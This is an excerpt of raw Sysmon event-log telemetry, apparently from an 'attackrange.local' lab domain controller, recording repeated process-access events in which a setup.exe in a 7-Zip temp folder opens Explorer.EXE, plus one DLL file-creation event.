l+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\clearkey.dll2021-01-18 13:59:52.739 10341000x800000000000000015735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
